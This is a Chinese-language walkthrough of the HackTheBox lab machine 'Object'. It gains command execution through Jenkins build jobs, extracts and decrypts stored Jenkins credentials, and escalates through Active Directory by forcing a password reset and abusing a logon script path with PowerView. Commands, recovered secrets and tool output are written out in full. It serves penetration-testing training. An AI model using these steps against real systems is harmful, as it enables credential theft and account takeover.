Object-htb-writeup

0x00 靶场技能介绍

章节技能:Jenkins的API令牌生成、Jenkins令牌使用、Jenkins密码配置文件读取、Jenkins密码解密破解、域环境枚举、DomainUserPassword滥用、域内通用写入访问权限、kerberast攻击、PowerView.ps1、敏感信息枚举、对象所有者保留修改对象安全描述符的能力,而不管对象的DACL上的权限如何、滥用用户对象的所有权、域用户账号多次横向运动

参考链接:https://0xdf.gitlab.io/2022/02/28/htb-object.html

参考链接:https://brsalcedom.github.io/Object-Writeup-HackTheBox/#consola-como-smith

参考链接:https://grav3m1nd-byte.gitbook.io/htb-resources/htb-retired-boxes/object#account-modification

0x01 用户权限获取

1、获取下靶机IP地址:10.10.11.132

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.132 -oG allports -Pn                     
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 05:41 CST
Nmap scan report for 10.10.11.132
Host is up (0.29s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
5985/tcp open  wsman
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 21.01 seconds
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,5985,8080 -sC -sV --min-rate=10000 10.10.11.132                                                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 05:42 CST
Nmap scan report for 10.10.11.132
Host is up (0.24s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
|_http-title: Mega Engines
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open  http    Jetty 9.4.43.v20210629
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.43.v20210629)
| http-robots.txt: 1 disallowed entry 
|_/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.44 seconds

3、服务器开放的端口还是比较少的,先简单的看一下吧

http://10.10.11.132/

4、这里只是一个页面,没有其他信息,但是发现的域名地址可以先本地绑定下

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.132 object.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.132 object.htb

5、继续看一下8080端口的服务内容

http://10.10.11.132:8080/login?from=%2F

6、这个服务还是很常见的,先注册一个账号

shiyan
shiyan

7、成功登录后,还是发现了一些信息的

http://10.10.11.132:8080/

Jenkins 2.317

8、且在用户配置界面上还发现了API的令牌

http://10.10.11.132:8080/user/shiyan/configure

115015ba38e9393b9ddcad289ec547880c

一旦我们有了令牌,我们就可以执行任务,如下所示:

http://[USERNAME]:[TOKEN]@[JENKINS-URL]/job/test/build?token=[TOKEN_NAME]

9、这里先随机创建了一个项目,但是在运行上面,发现只能依靠API的令牌方式来运行

http://10.10.11.132:8080/job/test/

10、根据截图,可以看出是运行了,但是出现报错了,所以,我再改一下配置

1
2
┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://shiyan:115015ba38e9393b9ddcad289ec547880c@object.htb:8080/job/test/build?token=115015ba38e9393b9ddcad289ec547880c

11、这里构造个普通的命令,查询当前用户名的命令

http://10.10.11.132:8080/job/test/configure

1
2
3
4
5
6
7
8
9
10
Started by remote host 10.10.14.38
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test
[test] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins8150549222580674392.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>whoami
object\oliver

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>exit 0 
Finished: SUCCESS

12、正常来说,到这里就是直接构造反弹shell的,但是存在防火墙的拦截,那就再找找其他方法吧,通过复杂的枚举过程,我们发现了一些配置信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
http://10.10.11.132:8080/job/test/4/console

Started by remote host 10.10.14.38
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test
[test] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins12376131197523855501.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>type ..\..\users\admin_17207690984073220035\config.xml 
<?xml version='1.1' encoding='UTF-8'?>
<user>
  <version>10</version>
  <id>admin</id>
  <fullName>admin</fullName>
  <properties>
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.6.1">
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
        <entry>
          <com.cloudbees.plugins.credentials.domains.Domain>
            <specifications/>
          </com.cloudbees.plugins.credentials.domains.Domain>
          <java.util.concurrent.CopyOnWriteArrayList>
            <com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
              <id>320a60b9-1e5c-4399-8afe-44466c9cde9e</id>
              <description></description>
              <username>oliver</username>
              <password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}</password>
              <usernameSecret>false</usernameSecret>
            </com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
          </java.util.concurrent.CopyOnWriteArrayList>
        </entry>
      </domainCredentialsMap>
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.84">
      <triggers/>
    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
    <hudson.model.MyViewsProperty>
      <views>
        <hudson.model.AllView>
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
          <name>all</name>
          <filterExecutors>false</filterExecutors>
          <filterQueue>false</filterQueue>
          <properties class="hudson.model.View$PropertyList"/>
        </hudson.model.AllView>
      </views>
    </hudson.model.MyViewsProperty>
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.5">
      <providerId>default</providerId>
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
    <hudson.model.PaneStatusProperties>
      <collapsed/>
    </hudson.model.PaneStatusProperties>
    <jenkins.security.seed.UserSeedProperty>
      <seed>ea75b5bd80e4763e</seed>
    </jenkins.security.seed.UserSeedProperty>
    <hudson.search.UserSearchProperty>
      <insensitiveSearch>true</insensitiveSearch>
    </hudson.search.UserSearchProperty>
    <hudson.model.TimeZoneProperty/>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
      <passwordHash>#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW</passwordHash>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
    <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.34">
      <emailAddress>admin@object.local</emailAddress>
    </hudson.tasks.Mailer_-UserProperty>
    <jenkins.security.ApiTokenProperty>
      <tokenStore>
        <tokenList/>
      </tokenStore>
    </jenkins.security.ApiTokenProperty>
    <jenkins.security.LastGrantedAuthoritiesProperty>
      <roles>
        <string>authenticated</string>
      </roles>
      <timestamp>1634793332195</timestamp>
    </jenkins.security.LastGrantedAuthoritiesProperty>
  </properties>
</user>
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>exit 0 
Finished: SUCCESS

13、这里发现了哈希值的密码,需要破解,通过在 Github 上发现了两个存储库,其中包含解密 Jenkins 上存储的用户密码的方法。这个是用 Go 编写的,并且有大量用于渗透测试 Jenkins 的 Python 脚本,两者都需要config.xml, 以及master.key和hudson.util.Secret, 但来自/secrets/ ,呢就开始获取下辅助的信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
http://10.10.11.132:8080/job/test/5/console

Started by remote host 10.10.14.38
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test
[test] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins6146753930529494803.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>type ..\..\secrets\master.key 
f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e564cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f9165679595b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>exit 0 
Finished: SUCCESS


http://10.10.11.132:8080/job/test/6/console

Started by remote host 10.10.14.38
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test
[test] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins788743132202005773.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>powershell -c [convert]::ToBase64String((cat ..\..\secrets\hudson.util.Secret -Encoding byte))  
gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>exit 0 
Finished: SUCCESS

14、下面就是已根据上面的脚本,开始破解了,上面的获取到的文件,直接创建复制到文件里就可以了,但是 hudson.util.secret 这个文件,需要解码一下再输出到文件里

https://github.com/gquere/pwn_jenkins/tree/master/offline_decryption

1
2
3
4
5
6
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA= | base64 -d > hudson.util.Secret

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 ./jenkins_offline_decrypt.py master.key hudson.util.Secret config.xml
c1cdfun_d2434

15、这里直接使用evil-winrm登录

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.132 -u oliver -p 'c1cdfun_d2434'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> whoami
object\oliver
*Evil-WinRM* PS C:\Users\oliver\Documents>

16、那就获取下第一个flag信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\oliver\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


    Directory: C:\Users\oliver\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        4/15/2024   6:33 AM             34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> cat user.txt
653debfc344c3d0a1b56dca26504176d
*Evil-WinRM* PS C:\Users\oliver\Desktop>

0x02 系统权限获取

17、继续手工枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls C:/Users


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/10/2021   3:20 AM                Administrator
d-----       10/26/2021   7:59 AM                maria
d-----       10/26/2021   7:58 AM                oliver
d-r---        4/10/2020  10:49 AM                Public
d-----       10/21/2021   3:44 AM                smith


*Evil-WinRM* PS C:\Users\oliver\Desktop> 

*Evil-WinRM* PS C:\Users\oliver\Desktop> netstat -an | findstr LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49673          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49674          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49679          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49747          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:55858          0.0.0.0:0              LISTENING
  TCP    10.10.11.132:53        0.0.0.0:0              LISTENING
  TCP    10.10.11.132:139       0.0.0.0:0              LISTENING
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING
  TCP    [::]:80                [::]:0                 LISTENING
  TCP    [::]:88                [::]:0                 LISTENING
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:464               [::]:0                 LISTENING
  TCP    [::]:593               [::]:0                 LISTENING
  TCP    [::]:3268              [::]:0                 LISTENING
  TCP    [::]:3269              [::]:0                 LISTENING
  TCP    [::]:5985              [::]:0                 LISTENING
  TCP    [::]:8080              [::]:0                 LISTENING
  TCP    [::]:9389              [::]:0                 LISTENING
  TCP    [::]:47001             [::]:0                 LISTENING
  TCP    [::]:49664             [::]:0                 LISTENING
  TCP    [::]:49665             [::]:0                 LISTENING
  TCP    [::]:49666             [::]:0                 LISTENING
  TCP    [::]:49667             [::]:0                 LISTENING
  TCP    [::]:49673             [::]:0                 LISTENING
  TCP    [::]:49674             [::]:0                 LISTENING
  TCP    [::]:49679             [::]:0                 LISTENING
  TCP    [::]:49747             [::]:0                 LISTENING
  TCP    [::]:55858             [::]:0                 LISTENING
  TCP    [::1]:53               [::]:0                 LISTENING
  TCP    [dead:beef::120]:53    [::]:0                 LISTENING
  TCP    [dead:beef::1572:9538:46ab:f370]:53  [::]:0                 LISTENING
  TCP    [fe80::1572:9538:46ab:f370%12]:53  [::]:0                 LISTENING
*Evil-WinRM* PS C:\Users\oliver\Desktop> 

# 这里存在53端口,88端口,636端口,很像一个域环境,下面测试看看

*Evil-WinRM* PS C:\Users\oliver\Desktop> net time /domain
Current time at \\jenkins.object.local is 4/15/2024 6:53:43 AM

The command completed successfully.

*Evil-WinRM* PS C:\Users\oliver\Desktop>

18、果然是一个域环境啊,那就简单了,上链接

1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\oliver\Desktop> net time /domain
Current time at \\jenkins.object.local is 4/15/2024 6:53:43 AM

The command completed successfully.

*Evil-WinRM* PS C:\Users\oliver\Desktop>

19、开始自动化枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
*Evil-WinRM* PS C:\Users\oliver\Desktop> 
*Evil-WinRM* PS C:\Users\oliver\Desktop> upload /home/kali/Desktop/tools/SharpHound/SharpHound.exe
                                        
Info: Uploading /home/kali/Desktop/tools/SharpHound/SharpHound.exe to C:\Users\oliver\Desktop\SharpHound.exe
                                        
Data: 1395368 bytes of 1395368 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


    Directory: C:\Users\oliver\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/15/2024   7:15 AM        1046528 SharpHound.exe
-ar---        4/15/2024   6:33 AM             34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> .\SharpHound.exe --CollectionMethods All --Domain object.local
2024-04-15T07:16:03.2966810-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-04-15T07:16:03.3904292-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-04-15T07:16:03.4060550-07:00|INFORMATION|Initializing SharpHound at 7:16 AM on 4/15/2024
2024-04-15T07:16:06.0623044-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for object.local : jenkins.object.local
2024-04-15T07:16:06.3904396-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-04-15T07:16:06.4841787-07:00|INFORMATION|Beginning LDAP search for object.local
2024-04-15T07:16:06.4998160-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-04-15T07:16:06.4998160-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-04-15T07:16:37.0623170-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-04-15T07:16:51.8123063-07:00|INFORMATION|Consumers finished, closing output channel
2024-04-15T07:16:51.8279309-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-04-15T07:16:51.8748068-07:00|INFORMATION|Status: 92 objects finished (+92 2.044445)/s -- Using 42 MB RAM
2024-04-15T07:16:51.8748068-07:00|INFORMATION|Enumeration finished in 00:00:45.3979747
2024-04-15T07:16:51.9216799-07:00|INFORMATION|Saving cache with stats: 52 ID to type mappings.
 52 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-04-15T07:16:51.9373076-07:00|INFORMATION|SharpHound Enumeration Completed at 7:16 AM on 4/15/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


    Directory: C:\Users\oliver\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/15/2024   7:16 AM          11433 20240415071651_BloodHound.zip
-a----        4/15/2024   7:16 AM           7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a----        4/15/2024   7:15 AM        1046528 SharpHound.exe
-ar---        4/15/2024   6:33 AM             34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> download 20240415071651_BloodHound.zip
                                        
Info: Downloading C:\Users\oliver\Desktop\20240415071651_BloodHound.zip to 20240415071651_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\oliver\Desktop>

20、上传到 bloodhund后,我们先标记我们已经拥有的用户,在标记目标权限

21、用户OLIVER‘@’OBJECT.LOCAL具有更改用户的能力,SMITH‘@’OBJECT.LOCAL的密码,而不知道该用户的当前密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
至少有两种方法可以执行此攻击。第一个也是最明显的是在Windows中使用内置的net.exe二进制文件(例如:net user dfm.a Password123!/domain)。请参阅opsec注意事项选项卡,了解为什么这可能是个坏主意。第二种方法,也是强烈推荐的方法,是使用PowerView中的Set DomainUserPassword函数。此函数在某些方面优于使用net.exe二进制文件。例如,您可以提供备用凭据,而不需要以具有ForceChangePassword权限的用户身份运行进程或登录。此外,与生成net.exe相比,您有更安全的执行选项(请参阅opsec选项卡)。


若要使用PowerView的Set DomainUserPassword滥用此权限,请首先将PowerView导入代理会话或控制台的PowerShell实例。您可能需要向域控制器进行身份验证asOLIVER@OBJECT.LOCAL如果您不是以该用户的身份运行进程。要与Set DomainUserPassword一起执行此操作,请首先创建一个PSCredential对象(这些示例来自PowerView帮助文档):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

然后为要在目标用户上设置的密码创建一个安全字符串对象:

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

最后,使用Set-DomainUserPassword,如果您还没有将进程作为OLIVER@OBJECT.LOCAL:

Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred

既然您知道了目标用户的纯文本密码,您就可以以该用户的身份启动新的代理,或者将该用户的凭据与PowerView的ACL滥用功能结合使用,甚至可以将RDP连接到目标用户可以访问的系统。有关更多想法和信息,请参阅参考选项卡。

22、那就先上传我们的工具吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
*Evil-WinRM* PS C:\Users\oliver\Desktop> upload /home/kali/Desktop/tools/PowerSploit/PowerView.ps1
                                        
Info: Uploading /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\oliver\Desktop\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


    Directory: C:\Users\oliver\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/15/2024   7:16 AM          11433 20240415071651_BloodHound.zip
-a----        4/15/2024   7:16 AM           7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a----        4/15/2024   7:31 AM         770279 PowerView.ps1
-a----        4/15/2024   7:15 AM        1046528 SharpHound.exe
-ar---        4/15/2024   6:33 AM             34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> $SecPassword = ConvertTo-SecureString 'c1cdfun_d2434' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('OBJECT.LOCAL\oliver', $SecPassword)
*Evil-WinRM* PS C:\Users\oliver\Desktop> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity smith -AccountPassword $UserPassword -Credential $Cred
*Evil-WinRM* PS C:\Users\oliver\Desktop>

23、成功修改密码,并登录该账号,哈哈!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.132 -u smith -p 'Password123!'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smith
*Evil-WinRM* PS C:\Users\smith\Documents>

24、继续下一个枚举过程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
用户SMITH@OBJECT.LOCAL对用户具有通用写入访问权限MARIA@OBJECT.LOCAL.

通用写入访问使您能够写入目标对象上的任何不受保护的属性,包括组的“成员”和用户的“serviceprincipalnames”


可以使用PowerView的Set DomainObject和Get DomainSPNTicket执行有针对性的kerberast攻击。

您可能需要向域控制器进行身份验证,身份为SMITH@OBJECT.LOCAL如果您不是以该用户的身份运行进程。要与Set DomainObject一起执行此操作,请首先创建一个PSCredential对象(这些示例来自PowerView帮助文档):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

然后,使用Set-DomainObject,如果您还没有将进程作为SMITH@OBJECT.LOCAL:

Set-DomainObject -Credential $Cred -Identity harmj0y -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

运行此程序后,您可以按如下方式使用Get-DomainSPNTicket:

Get-DomainSPNTicket -Credential $Cred harmj0y | fl

可以使用您选择的工具离线破解恢复的哈希。ServicePrincipalName的清理可以使用Set DomainObject命令完成:

Set-DomainObject -Credential $Cred -Identity harmj0y -Clear serviceprincipalname

25、由于我们是有这个用户的权限,那就直接开始创建吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\smith\Documents> upload /home/kali/Desktop/tools/PowerSploit/PowerView.ps1
                                        
Info: Uploading /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\smith\Documents\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\smith\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\smith\Documents> Set-DomainObject -Identity smith -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Warning: [Set-DomainObject] Error setting/replacing properties for object 'smith' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied.
"
*Evil-WinRM* PS C:\Users\smith\Documents> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\smith\Documents> $Cred = New-Object System.Management.Automation.PSCredential('OBJECT.LOCAL\smith', $SecPassword)
*Evil-WinRM* PS C:\Users\smith\Documents> Set-DomainObject -Credential $Cred -Identity smith -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Warning: [Set-DomainObject] Error setting/replacing properties for object 'smith' : Exception calling "CommitChanges" with "0" argument(s): "Access is denied.
"
*Evil-WinRM* PS C:\Users\smith\Documents>

26、这里在运行的时候出错了,根据查看演练报告,可以知道,修改下上面的命令,可以读取到一些信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
Set-DomainObject -Identity [USER] -SET @{scriptpath='[SCRIPT-PATH]'}

# 我们将在 Temp 目录下创建脚本,以免出现权限问题,并插入以下内容:

dir C:\Users\maria\Desktop > C:\Temp\out.txt


Set-DomainObject -Identity maria -SET @{scriptpath='C:\Temp\test.ps1'}


*Evil-WinRM* PS C:\Users\smith\Documents> mkdir C:/Temp


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        4/15/2024   8:00 AM                Temp


*Evil-WinRM* PS C:\Users\smith\Documents> cd C:/Temp
*Evil-WinRM* PS C:\Temp> 



*Evil-WinRM* PS C:\Temp> upload /home/kali/Desktop/test.ps1
                                        
Info: Uploading /home/kali/Desktop/test.ps1 to C:\Temp\test.ps1
                                        
Data: 60 bytes of 60 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Temp> Set-DomainObject -Identity maria -SET @{scriptpath='C:\Temp\test.ps1'}
*Evil-WinRM* PS C:\Temp> ls


    Directory: C:\Temp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/15/2024   8:06 AM            830 out.txt
-a----        4/15/2024   8:06 AM             45 test.ps1


*Evil-WinRM* PS C:\Temp> cat out.txt


    Directory: C:\Users\maria\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/26/2021   8:13 AM           6144 Engines.xls


*Evil-WinRM* PS C:\Temp>

27、这里发现目标用户目录下有个文件,我们把这个文件拷贝下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
*Evil-WinRM* PS C:\Temp> upload /home/kali/Desktop/file.ps1
                                        
Info: Uploading /home/kali/Desktop/file.ps1 to C:\Temp\file.ps1
                                        
Data: 80 bytes of 80 bytes copied
                                        
Info: Upload successful!
